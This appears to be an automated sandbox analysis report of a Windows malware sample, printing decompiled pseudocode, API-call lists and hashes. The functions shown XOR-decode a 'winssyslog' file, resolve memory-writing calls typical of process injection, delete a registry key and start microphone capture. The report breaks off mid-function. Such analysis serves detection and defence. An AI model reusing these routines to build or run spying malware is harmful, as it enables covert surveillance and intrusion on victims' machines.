					_t41 = GetFileSize(_t58, 0);
					_push(_t41);
					_t61 = E04ED5785(L"winssyslog", __esi, _t72);
					_v536 = _t61;
					ReadFile(_t58, _t61, _t41,  &_v532, 0);
					_t30 = 0;
					if(_t41 != 0) {
						if(_t41 >= 0x20) {
							asm("movaps xmm2, [0x4efe8f0]");
							_t56 = _t41 - (_t41 & 0x0000001f);
							asm("o16 nop [eax+eax]");
							do {
								asm("movups xmm0, [esi+eax]");
								asm("movaps xmm1, xmm2");
								asm("pxor xmm1, xmm0");
								asm("movups [esi+eax], xmm1");
								asm("movups xmm0, [esi+eax+0x10]");
								asm("pxor xmm0, xmm2");
								asm("movups [esi+eax+0x10], xmm0");
								_t30 = _t30 + 0x20;
							} while (_t30 < _t56);
						}
						while(_t30 < _t41) {
							 *(_t30 + _t61) =  *(_t30 + _t61) ^ 0x00000058;
							_t30 = _t30 + 1;
						}
					}
					_t11 = _t41 + 1; // 0x1
					_t62 = _t11;
					_t59 = LocalAlloc(0x40, _t62);
					_t13 = _t59 + 1; // 0x1
					 *_t59 = 0x7f;
					E04EDDC90(_t13, _v536, _t41);
					_push(0x3f);
					_push(_t62);
					E04EB1C60( *((intOrPtr*)(_v540 + 4)));
					LocalFree(_t59);
					E04ED573F(_v536);
					CloseHandle(_v544);
					return E04ED572E(_v8 ^ _t65, _t59);
				}
			}


















                                                                                    0x04ebb6b9
                                                                                    0x04ebb6c0
                                                                                    0x04ebb6c4
                                                                                    0x04ebb6d0
                                                                                    0x04ebb6d9
                                                                                    0x04ebb6e3
                                                                                    0x04ebb70a
                                                                                    0x04ebb70c
                                                                                    0x04ebb712
                                                                                    0x04ebb715
                                                                                    0x04ebb80e
                                                                                    0x04ebb819
                                                                                    0x04ebb71b
                                                                                    0x04ebb71b
                                                                                    0x04ebb71c
                                                                                    0x04ebb726
                                                                                    0x04ebb728
                                                                                    0x04ebb731
                                                                                    0x04ebb739
                                                                                    0x04ebb745
                                                                                    0x04ebb74b
                                                                                    0x04ebb74f
                                                                                    0x04ebb754
                                                                                    0x04ebb756
                                                                                    0x04ebb764
                                                                                    0x04ebb766
                                                                                    0x04ebb770
                                                                                    0x04ebb770
                                                                                    0x04ebb774
                                                                                    0x04ebb777
                                                                                    0x04ebb77b
                                                                                    0x04ebb77f
                                                                                    0x04ebb784
                                                                                    0x04ebb788
                                                                                    0x04ebb78d
                                                                                    0x04ebb790
                                                                                    0x04ebb770
                                                                                    0x04ebb796
                                                                                    0x04ebb798
                                                                                    0x04ebb79c
                                                                                    0x04ebb79d
                                                                                    0x04ebb796
                                                                                    0x04ebb7a1
                                                                                    0x04ebb7a1
                                                                                    0x04ebb7ad
                                                                                    0x04ebb7b7
                                                                                    0x04ebb7ba
                                                                                    0x04ebb7be
                                                                                    0x04ebb7cf
                                                                                    0x04ebb7d1
                                                                                    0x04ebb7d3
                                                                                    0x04ebb7db
                                                                                    0x04ebb7e2
                                                                                    0x04ebb7f0
                                                                                    0x04ebb808
                                                                                    0x04ebb808

                                                                                    APIs
                                                                                      • Part of subcall function 04EC6330: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 04EC6356
                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,74E06490), ref: 04EBB704
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,74E06490), ref: 04EBB720
                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,74E06490), ref: 04EBB745
                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,?,74E06490), ref: 04EBB7A7
                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000001,0000003F,?,?,00000000,?,74E06490), ref: 04EBB7DB
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00000000,?,74E06490), ref: 04EBB7F0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: File$Local$AllocCloseCreateDirectoryFreeHandleReadSizeSystem
                                                                                    • String ID: $winssyslog
                                                                                    • API String ID: 245316060-3650450327
                                                                                    • Opcode ID: fb1382e23f81281a00671a34817a843e0173ff22fb52100c813809f01556cf46
                                                                                    • Instruction ID: a080d5596e008832593f72b3a1e51de6ec970c30be2e4fa50660fb960364c96b
                                                                                    • Opcode Fuzzy Hash: fb1382e23f81281a00671a34817a843e0173ff22fb52100c813809f01556cf46
                                                                                    • Instruction Fuzzy Hash: E5416D31A003186BE7209F74DC85FFAB7A8EF95304F1046A9FD49A7181EF74B9458790
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC8E80, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 116libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 60%
                                                                                    			E04EC8E80(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				intOrPtr _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t11;
				intOrPtr* _t16;
				intOrPtr _t27;
				void* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t31;
				intOrPtr _t33;
				void* _t34;
				intOrPtr* _t35;
				struct HINSTANCE__* _t36;
				intOrPtr _t39;
				void* _t41;

				_t33 = __edx;
				_t39 =  *0x4f06b54; // 0x7ffc
				_t27 = __edx;
				_v8 = __ecx;
				_t30 =  *0x4f06b50; // 0x8dcda6c0
				_push(_t34);
				if(_t30 != 0 || _t39 != 0) {
					L7:
					_t35 = _a16;
					if(_t35 == 0) {
						_t11 = 0;
					} else {
						_t11 =  *_t35;
					}
					_v20 = _t11;
					asm("cdq");
					_push(_t33);
					_push( &_v20);
					_push(0);
					_push(_a12);
					_v16 = 0;
					asm("cdq");
					_push(_t33);
					_push(_t27);
					_push(_a8);
					asm("cdq");
					_t28 = E04EC8170(_t30, _t39, 5, _v8, _t33, _a4);
					if(_t28 != 0 || _t33 != 0) {
						_t16 =  *0x4f06b48;
						if(_t16 == 0) {
							L17:
							_t36 = GetModuleHandleW(L"ntdll.dll");
							 *0x4f06b48 = GetProcAddress(_t36, "RtlNtStatusToDosError");
							_t31 = GetProcAddress(_t36, "RtlSetLastWin32Error");
							_t16 =  *0x4f06b48;
							 *0x4f06b28 = _t31;
						} else {
							_t31 =  *0x4f06b28;
							if(_t31 == 0) {
								goto L17;
							}
						}
						if(_t16 != 0 && _t31 != 0) {
							RtlRestoreLastWin32Error( *_t16(_t28));
						}
						goto L21;
					} else {
						if(_t35 != 0) {
							 *_t35 = _v20;
						}
						return 1;
					}
				} else {
					_t25 =  *0x4f06b40; // 0x8dc40000
					_t33 =  *0x4f06b44; // 0x7ffc
					if(_t25 == 0 && _t33 == 0) {
						 *0x4f06b40 = E04EC8350(_t30);
						 *0x4f06b44 = _t33;
					}
					_t30 = E04EC8B50(_t27, "NtWriteVirtualMemory", _t33, _t34, _t39, _t25, _t33);
					_t41 = _t41 + 8;
					 *0x4f06b50 = _t30;
					_t39 = _t33;
					 *0x4f06b54 = _t39;
					if(_t30 != 0 || _t39 != 0) {
						goto L7;
					} else {
						L21:
						return 0;
					}
				}
			}





















                                                                                    0x04ec8e80
                                                                                    0x04ec8e88
                                                                                    0x04ec8e8e
                                                                                    0x04ec8e90
                                                                                    0x04ec8e93
                                                                                    0x04ec8e99
                                                                                    0x04ec8e9c
                                                                                    0x04ec8ef0
                                                                                    0x04ec8ef0
                                                                                    0x04ec8ef5
                                                                                    0x04ec8efb
                                                                                    0x04ec8ef7
                                                                                    0x04ec8ef7
                                                                                    0x04ec8ef7
                                                                                    0x04ec8efd
                                                                                    0x04ec8f03
                                                                                    0x04ec8f04
                                                                                    0x04ec8f05
                                                                                    0x04ec8f06
                                                                                    0x04ec8f08
                                                                                    0x04ec8f0d
                                                                                    0x04ec8f14
                                                                                    0x04ec8f15
                                                                                    0x04ec8f16
                                                                                    0x04ec8f17
                                                                                    0x04ec8f20
                                                                                    0x04ec8f2c
                                                                                    0x04ec8f33
                                                                                    0x04ec8f4e
                                                                                    0x04ec8f55
                                                                                    0x04ec8f61
                                                                                    0x04ec8f72
                                                                                    0x04ec8f82
                                                                                    0x04ec8f89
                                                                                    0x04ec8f8b
                                                                                    0x04ec8f90
                                                                                    0x04ec8f57
                                                                                    0x04ec8f57
                                                                                    0x04ec8f5f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec8f5f
                                                                                    0x04ec8f98
                                                                                    0x04ec8fa2
                                                                                    0x04ec8fa2
                                                                                    0x00000000
                                                                                    0x04ec8f39
                                                                                    0x04ec8f3b
                                                                                    0x04ec8f40
                                                                                    0x04ec8f40
                                                                                    0x04ec8f4d
                                                                                    0x04ec8f4d
                                                                                    0x04ec8ea2
                                                                                    0x04ec8ea2
                                                                                    0x04ec8ea7
                                                                                    0x04ec8eaf
                                                                                    0x04ec8eba
                                                                                    0x04ec8ebf
                                                                                    0x04ec8ebf
                                                                                    0x04ec8ed1
                                                                                    0x04ec8ed3
                                                                                    0x04ec8ed6
                                                                                    0x04ec8edc
                                                                                    0x04ec8ede
                                                                                    0x04ec8ee6
                                                                                    0x00000000
                                                                                    0x04ec8fa8
                                                                                    0x04ec8fa8
                                                                                    0x04ec8fb0
                                                                                    0x04ec8fb0
                                                                                    0x04ec8ee6

                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,?,00000000,00000000,04ECBC35,04EC90B9,00000000), ref: 04EC8F66
                                                                                    • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 04EC8F7A
                                                                                    • GetProcAddress.KERNEL32(00000000,RtlSetLastWin32Error), ref: 04EC8F87
                                                                                    • RtlRestoreLastWin32Error.NTDLL(00000000), ref: 04EC8FA2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$ErrorHandleLastModuleRestoreWin32
                                                                                    • String ID: NtWriteVirtualMemory$RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
                                                                                    • API String ID: 3496116238-1394624420
                                                                                    • Opcode ID: a3478f2bcc67281685f2fd6f8e31c1e79f80166e8dda037831c334600b569b95
                                                                                    • Instruction ID: 6c16d5e9376de4e6a95e041862fdc1b03d3399202f230698f507d425af02d0c8
                                                                                    • Opcode Fuzzy Hash: a3478f2bcc67281685f2fd6f8e31c1e79f80166e8dda037831c334600b569b95
                                                                                    • Instruction Fuzzy Hash: E33145F5B002199FEB14AF59AF40A7B77AAFBC471AB04512DFD09D3200E774AC528750
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EBEE90, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 116registrysynchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 83%
                                                                                    			E04EBEE90(void* __ebx, void* __ecx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				char _v88;
				short _v608;
				void* _v612;
				signed int _t29;
				signed int _t38;
				intOrPtr* _t43;
				void* _t45;
				void* _t46;
				signed int _t54;
				intOrPtr* _t57;
				intOrPtr* _t68;
				void* _t70;
				void* _t71;
				signed int _t72;
				intOrPtr* _t75;
				signed int _t76;
				void* _t77;

				_t29 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t29 ^ _t76;
				_t57 =  *0x4f06aec; // 0x339e680
				_t70 = __ecx;
				_t75 =  *_t57;
				_v612 = __ecx;
				while(_t75 != _t57) {
					while( *_t43 ==  *_t68) {
						_t43 = _t43 + 4;
						_t68 = _t68 + 4;
						_t71 = _t71 - 4;
						if(_t71 >= 0) {
							continue;
						}
						if( *_t43 ==  *_t68) {
							_t72 =  *(_t75 + 8);
							_t45 =  *_t72;
							__eflags =  *(_t45 + 4);
							 *(_t72 + 0x28) = 1;
							 *(_t72 + 0x24) = 0;
							if( *(_t45 + 4) != 0) {
								L11:
								_t46 =  *(_t72 + 0x20);
								__eflags = _t46;
								if(_t46 != 0) {
									WaitForSingleObject(_t46, 0xffffffff);
									CloseHandle( *(_t72 + 0x20));
									 *(_t72 + 0x20) = 0;
								}
								L13:
								 *(_t72 + 0x28) = 0;
								_t73 =  *(_t75 + 8);
								__eflags =  *(_t75 + 8);
								if(__eflags != 0) {
									E04EBE250(_t73, __eflags);
									_push(0x30);
									E04ED5777(_t73);
									_t77 = _t77 + 8;
								}
								 *((intOrPtr*)( *((intOrPtr*)(_t75 + 4)))) =  *_t75;
								 *((intOrPtr*)( *_t75 + 4)) =  *((intOrPtr*)(_t75 + 4));
								 *0x4f06af0 =  *0x4f06af0 - 1;
								__eflags =  *0x4f06af0;
								L04ED57B1(_t75);
								_t70 = _v612;
								_t77 = _t77 + 4;
								goto L16;
							}
							_t66 =  *(_t72 + 0x2c);
							__eflags =  *(_t72 + 0x2c);
							if( *(_t72 + 0x2c) == 0) {
								goto L13;
							}
							_t54 = E04EBD240(_t66, "stop");
							__eflags = _t54;
							if(_t54 == 0) {
								goto L13;
							}
							 *_t54();
							goto L11;
						}
						break;
					}
					_t75 =  *_t75;
					_t70 = _v612;
				}
				L16:
				__eflags = _a4;
				if(_a4 != 0) {
					E04EC6010(_t57, L"Pg",  &_v88, _t70, _t75);
					wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s\\%s",  &_v88, _t70);
					_v612 = 0;
					_t38 = RegOpenKeyExW(0x80000002,  &_v608, 0, 0x20106,  &_v612);
					__eflags = _t38;
					if(_t38 == 0) {
						SHDeleteKeyW(_v612, 0x4efb5d0);
						RegCloseKey(_v612);
					}
				}
				__eflags = _v8 ^ _t76;
				return E04ED572E(_v8 ^ _t76);
			}





















                                                                                    0x04ebee99
                                                                                    0x04ebeea0
                                                                                    0x04ebeea4
                                                                                    0x04ebeeac
                                                                                    0x04ebeeae
                                                                                    0x04ebeeb0
                                                                                    0x04ebeeb6
                                                                                    0x04ebeed0
                                                                                    0x04ebeed6
                                                                                    0x04ebeed9
                                                                                    0x04ebeedc
                                                                                    0x04ebeedf
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebeee5
                                                                                    0x04ebeef1
                                                                                    0x04ebeef4
                                                                                    0x04ebeef6
                                                                                    0x04ebeefa
                                                                                    0x04ebef01
                                                                                    0x04ebef08
                                                                                    0x04ebef21
                                                                                    0x04ebef21
                                                                                    0x04ebef24
                                                                                    0x04ebef26
                                                                                    0x04ebef2b
                                                                                    0x04ebef34
                                                                                    0x04ebef3a
                                                                                    0x04ebef3a
                                                                                    0x04ebef41
                                                                                    0x04ebef41
                                                                                    0x04ebef48
                                                                                    0x04ebef4b
                                                                                    0x04ebef4d
                                                                                    0x04ebef51
                                                                                    0x04ebef56
                                                                                    0x04ebef59
                                                                                    0x04ebef5e
                                                                                    0x04ebef5e
                                                                                    0x04ebef67
                                                                                    0x04ebef6e
                                                                                    0x04ebef71
                                                                                    0x04ebef71
                                                                                    0x04ebef77
                                                                                    0x04ebef7c
                                                                                    0x04ebef82
                                                                                    0x00000000
                                                                                    0x04ebef82
                                                                                    0x04ebef0a
                                                                                    0x04ebef0d
                                                                                    0x04ebef0f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebef16
                                                                                    0x04ebef1b
                                                                                    0x04ebef1d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ebef1f
                                                                                    0x00000000
                                                                                    0x04ebef1f
                                                                                    0x00000000
                                                                                    0x04ebeee5
                                                                                    0x04ebeee7
                                                                                    0x04ebeee9
                                                                                    0x04ebeee9
                                                                                    0x04ebef85
                                                                                    0x04ebef85
                                                                                    0x04ebef89
                                                                                    0x04ebef93
                                                                                    0x04ebefa9
                                                                                    0x04ebefb2
                                                                                    0x04ebefd6
                                                                                    0x04ebefdc
                                                                                    0x04ebefde
                                                                                    0x04ebefeb
                                                                                    0x04ebeff7
                                                                                    0x04ebeff7
                                                                                    0x04ebefde
                                                                                    0x04ebf002
                                                                                    0x04ebf00d

                                                                                    APIs
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,00000001), ref: 04EBEF2B
                                                                                    • CloseHandle.KERNEL32(?), ref: 04EBEF34
                                                                                    • wsprintfW.USER32 ref: 04EBEFA9
                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020106,00000000), ref: 04EBEFD6
                                                                                    • SHDeleteKeyW.SHLWAPI(00000000,04EFB5D0), ref: 04EBEFEB
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 04EBEFF7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Close$DeleteHandleObjectOpenSingleWaitwsprintf
                                                                                    • String ID: SOFTWARE\Classes\CLSID\%s\%s$stop
                                                                                    • API String ID: 1878782464-96441376
                                                                                    • Opcode ID: 22c1c2fa6e3c39f440bc57a4cf1ca34052d6af6cad0288fab35e4f6c7fda611b
                                                                                    • Instruction ID: 2add391681ed4b65bf89fc5aa63e51c26e80f2ed4ed167a11a7faeafc803dc0b
                                                                                    • Opcode Fuzzy Hash: 22c1c2fa6e3c39f440bc57a4cf1ca34052d6af6cad0288fab35e4f6c7fda611b
                                                                                    • Instruction Fuzzy Hash: 8441AE31600208EFE724DF68DC84BEAB7B5FF88314F145198E98AA7650DB76BD54DB80
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC8D50, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 108libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 64%
                                                                                    			E04EC8D50(intOrPtr __ecx, intOrPtr __edx, char _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t18;
				intOrPtr _t28;
				void* _t29;
				_Unknown_base(*)()* _t31;
				intOrPtr _t33;
				intOrPtr _t34;
				struct HINSTANCE__* _t35;
				intOrPtr _t36;
				void* _t38;

				_t33 = __edx;
				_t36 =  *0x4f06b24; // 0x7ffc
				_t28 = __edx;
				_t34 =  *0x4f06b20; // 0x8dcda340
				_v8 = __ecx;
				if(_t34 != 0 || _t36 != 0) {
					L7:
					_v28 = _a4;
					_push(0);
					_v24 = _a8;
					_push(0x4000);
					asm("cdq");
					_push(_t33);
					_push( &_v20);
					_v20 = _t28;
					asm("cdq");
					_push(_t33);
					asm("cdq");
					_v16 = 0;
					_t29 = E04EC8170(_t34, _t36, 4, _v8, _t33,  &_v28);
					if(_t29 != 0 || _t33 != 0) {
						_t18 =  *0x4f06b48;
						if(_t18 == 0) {
							L12:
							_t35 = GetModuleHandleW(L"ntdll.dll");
							 *0x4f06b48 = GetProcAddress(_t35, "RtlNtStatusToDosError");
							_t31 = GetProcAddress(_t35, "RtlSetLastWin32Error");
							_t18 =  *0x4f06b48;
							 *0x4f06b28 = _t31;
						} else {
							_t31 =  *0x4f06b28;
							if(_t31 == 0) {
								goto L12;
							}
						}
						if(_t18 != 0 && _t31 != 0) {
							RtlRestoreLastWin32Error( *_t18(_t29));
						}
						goto L16;
					} else {
						_t11 = _t29 + 1; // 0x1
						return _t11;
					}
				} else {
					_t26 =  *0x4f06b40; // 0x8dc40000
					_t33 =  *0x4f06b44; // 0x7ffc
					if(_t26 == 0 && _t33 == 0) {
						 *0x4f06b40 = E04EC8350(__ecx);
						 *0x4f06b44 = _t33;
					}
					_t34 = E04EC8B50(_t28, "NtFreeVirtualMemory", _t33, _t34, _t36, _t26, _t33);
					_t38 = _t38 + 8;
					 *0x4f06b20 = _t34;
					_t36 = _t33;
					 *0x4f06b24 = _t36;
					if(_t34 != 0 || _t36 != 0) {
						goto L7;
					} else {
						L16:
						return 0;
					}
				}
			}




















                                                                                    0x04ec8d50
                                                                                    0x04ec8d58
                                                                                    0x04ec8d5e
                                                                                    0x04ec8d61
                                                                                    0x04ec8d67
                                                                                    0x04ec8d6c
                                                                                    0x04ec8dc0
                                                                                    0x04ec8dc3
                                                                                    0x04ec8dc9
                                                                                    0x04ec8dcb
                                                                                    0x04ec8dd1
                                                                                    0x04ec8dd6
                                                                                    0x04ec8dd7
                                                                                    0x04ec8dd8
                                                                                    0x04ec8ddc
                                                                                    0x04ec8ddf
                                                                                    0x04ec8de0
                                                                                    0x04ec8de5
                                                                                    0x04ec8dec
                                                                                    0x04ec8df8
                                                                                    0x04ec8dff
                                                                                    0x04ec8e0f
                                                                                    0x04ec8e16
                                                                                    0x04ec8e22
                                                                                    0x04ec8e33
                                                                                    0x04ec8e43
                                                                                    0x04ec8e4a
                                                                                    0x04ec8e4c
                                                                                    0x04ec8e51
                                                                                    0x04ec8e18
                                                                                    0x04ec8e18
                                                                                    0x04ec8e20
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec8e20
                                                                                    0x04ec8e59
                                                                                    0x04ec8e63
                                                                                    0x04ec8e63
                                                                                    0x00000000
                                                                                    0x04ec8e05
                                                                                    0x04ec8e05
                                                                                    0x04ec8e0e
                                                                                    0x04ec8e0e
                                                                                    0x04ec8d72
                                                                                    0x04ec8d72
                                                                                    0x04ec8d77
                                                                                    0x04ec8d7f
                                                                                    0x04ec8d8a
                                                                                    0x04ec8d8f
                                                                                    0x04ec8d8f
                                                                                    0x04ec8da1
                                                                                    0x04ec8da3
                                                                                    0x04ec8da6
                                                                                    0x04ec8dac
                                                                                    0x04ec8dae
                                                                                    0x04ec8db6
                                                                                    0x00000000
                                                                                    0x04ec8e6b
                                                                                    0x04ec8e6b
                                                                                    0x04ec8e71
                                                                                    0x04ec8e71
                                                                                    0x04ec8db6

                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,00000000,00000000,04ECBC35,?,?,04EC91F7), ref: 04EC8E27
                                                                                    • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 04EC8E3B
                                                                                    • GetProcAddress.KERNEL32(00000000,RtlSetLastWin32Error), ref: 04EC8E48
                                                                                    • RtlRestoreLastWin32Error.NTDLL(00000000), ref: 04EC8E63
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$ErrorHandleLastModuleRestoreWin32
                                                                                    • String ID: NtFreeVirtualMemory$RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
                                                                                    • API String ID: 3496116238-2303597063
                                                                                    • Opcode ID: 1df4dcea06c30186ba8cd3364bdb615a255e0d2dc7791e679bfe821058e8ecf2
                                                                                    • Instruction ID: 291bec52ed908ae1d98fa2af5207400651c45320aae67277335826c116d67877
                                                                                    • Opcode Fuzzy Hash: 1df4dcea06c30186ba8cd3364bdb615a255e0d2dc7791e679bfe821058e8ecf2
                                                                                    • Instruction Fuzzy Hash: 703145F5A002199FE714EF59AE40A7ABBFDFBC8719B04512EED04D7200E774AD518B90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB2000, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74synchronizationsleepCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 67%
                                                                                    			E04EB2000(intOrPtr* __ecx, intOrPtr _a4, char _a7) {
				void* _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				void* __esi;
				intOrPtr _t18;
				intOrPtr _t23;
				intOrPtr _t29;
				intOrPtr* _t33;
				void* _t36;

				_t18 = _a4;
				_t33 = __ecx;
				 *__ecx = 0x4efd8b0;
				 *((intOrPtr*)(__ecx + 4)) = _t18;
				 *((intOrPtr*)(_t18 + 0x38)) = __ecx;
				 *(_t33 + 8) = CreateEventW(0, 1, 0, 0);
				 *_t33 = 0x4efc858;
				if(waveInGetNumDevs() != 0) {
					_t47 =  *0x4f068c8;
					if( *0x4f068c8 == 0) {
						_t36 = E04ED5744(CreateEventW, _t47, 0x5c);
						_t23 = E04EB1190(_t36, _t47);
						_push(_t36);
						_push(0x3f);
						 *((intOrPtr*)(_t33 + 0xc)) = _t23;
						_push(1);
						_push( &_a7);
						 *0x4f068c8 = 1;
						_a7 = 0x7c;
						E04EB1C60( *((intOrPtr*)(_t33 + 4)));
						WaitForSingleObject( *(_t33 + 8), 0xffffffff);
						Sleep(0x96);
						_v24 = E04EB2220;
						_v20 = _t33;
						_v16 = 0;
						_v12 = CreateEventW(0, 0, 0, 0);
						_t29 = E04EDF4C7( *((intOrPtr*)(_t33 + 4)), 0, 0, E04EC53C0,  &_v24, 0, 0);
						WaitForSingleObject(_v12, 0xffffffff);
						CloseHandle(_v12);
						 *((intOrPtr*)(_t33 + 0x10)) = _t29;
					}
				}
				return _t33;
			}













                                                                                    0x04eb2003
                                                                                    0x04eb2011
                                                                                    0x04eb2019
                                                                                    0x04eb201f
                                                                                    0x04eb2024
                                                                                    0x04eb2029
                                                                                    0x04eb202c
                                                                                    0x04eb203a
                                                                                    0x04eb2040
                                                                                    0x04eb2047
                                                                                    0x04eb2057
                                                                                    0x04eb2059
                                                                                    0x04eb205e
                                                                                    0x04eb2062
                                                                                    0x04eb2064
                                                                                    0x04eb206a
                                                                                    0x04eb206c
                                                                                    0x04eb206d
                                                                                    0x04eb2074
                                                                                    0x04eb2078
                                                                                    0x04eb2082
                                                                                    0x04eb208d
                                                                                    0x04eb209b
                                                                                    0x04eb20a2
                                                                                    0x04eb20a5
                                                                                    0x04eb20af
                                                                                    0x04eb20bf
                                                                                    0x04eb20ce
                                                                                    0x04eb20d7
                                                                                    0x04eb20dd
                                                                                    0x04eb20dd
                                                                                    0x04eb2047
                                                                                    0x04eb20e7

                                                                                    APIs
                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 04EB2027
                                                                                    • waveInGetNumDevs.WINMM ref: 04EB2032
                                                                                      • Part of subcall function 04EB1190: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,74E5F5E0,?,04EB205E), ref: 04EB11A9
                                                                                      • Part of subcall function 04EB1190: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,74E5F5E0,?,04EB205E), ref: 04EB11B6
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,00000001,0000003F), ref: 04EB2082
                                                                                    • Sleep.KERNEL32(00000096), ref: 04EB208D
                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 04EB20A9
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04EB20CE
                                                                                    • CloseHandle.KERNEL32(?), ref: 04EB20D7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateEvent$ObjectSingleWait$CloseDevsHandleSleepwave
                                                                                    • String ID: |
                                                                                    • API String ID: 1906678132-2343686810
                                                                                    • Opcode ID: 856cf4f62ae6ee2e630af32be800aaf22e2d2d21a40d3ee57a7f694ae52fca23
                                                                                    • Instruction ID: 512b803e87fe885df94db05004cd9dae6e7f1b33247fdeccf3cbf1d607ba3e8c
                                                                                    • Opcode Fuzzy Hash: 856cf4f62ae6ee2e630af32be800aaf22e2d2d21a40d3ee57a7f694ae52fca23
                                                                                    • Instruction Fuzzy Hash: D321A471A40304BFFB119FA49C86BAA7FA4EF04714F10519AFA14AE2C5DAB5B940CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EB7970, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 60libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 95%
                                                                                    			E04EB7970(intOrPtr* __ecx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t15;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t17;
				void* _t21;
				intOrPtr _t22;
				struct HINSTANCE__* _t24;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t25 = __ecx;
				_t27 = __ecx;
				_t1 = _t27 + 0x10; // 0x10
				_t26 = _t1;
				 *_t26 = 0;
				 *__ecx = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				 *((short*)(__ecx + 0x18)) = 2;
				_t24 = LoadLibraryA("ntdll.dll");
				if(_t24 != 0) {
					_t15 = GetProcAddress(_t24, "RtlGetCompressionWorkSpaceSize");
					 *(_t27 + 4) = _t15;
					if(_t15 != 0) {
						_t16 = GetProcAddress(_t24, "RtlCompressBuffer");
						 *(_t27 + 8) = _t16;
						if(_t16 != 0) {
							_t17 = GetProcAddress(_t24, "RtlDecompressBuffer");
							 *(_t27 + 0xc) = _t17;
							if(_t17 != 0) {
								_t8 = _t27 + 0x14; // 0x14
								_t21 =  *( *(_t27 + 4))( *(_t27 + 0x18) & 0x0000ffff, _t26, _t8);
								_t35 = _t21;
								if(_t21 == 0) {
									_push( *_t26);
									_t22 = E04ED5785(_t25, _t27, _t35);
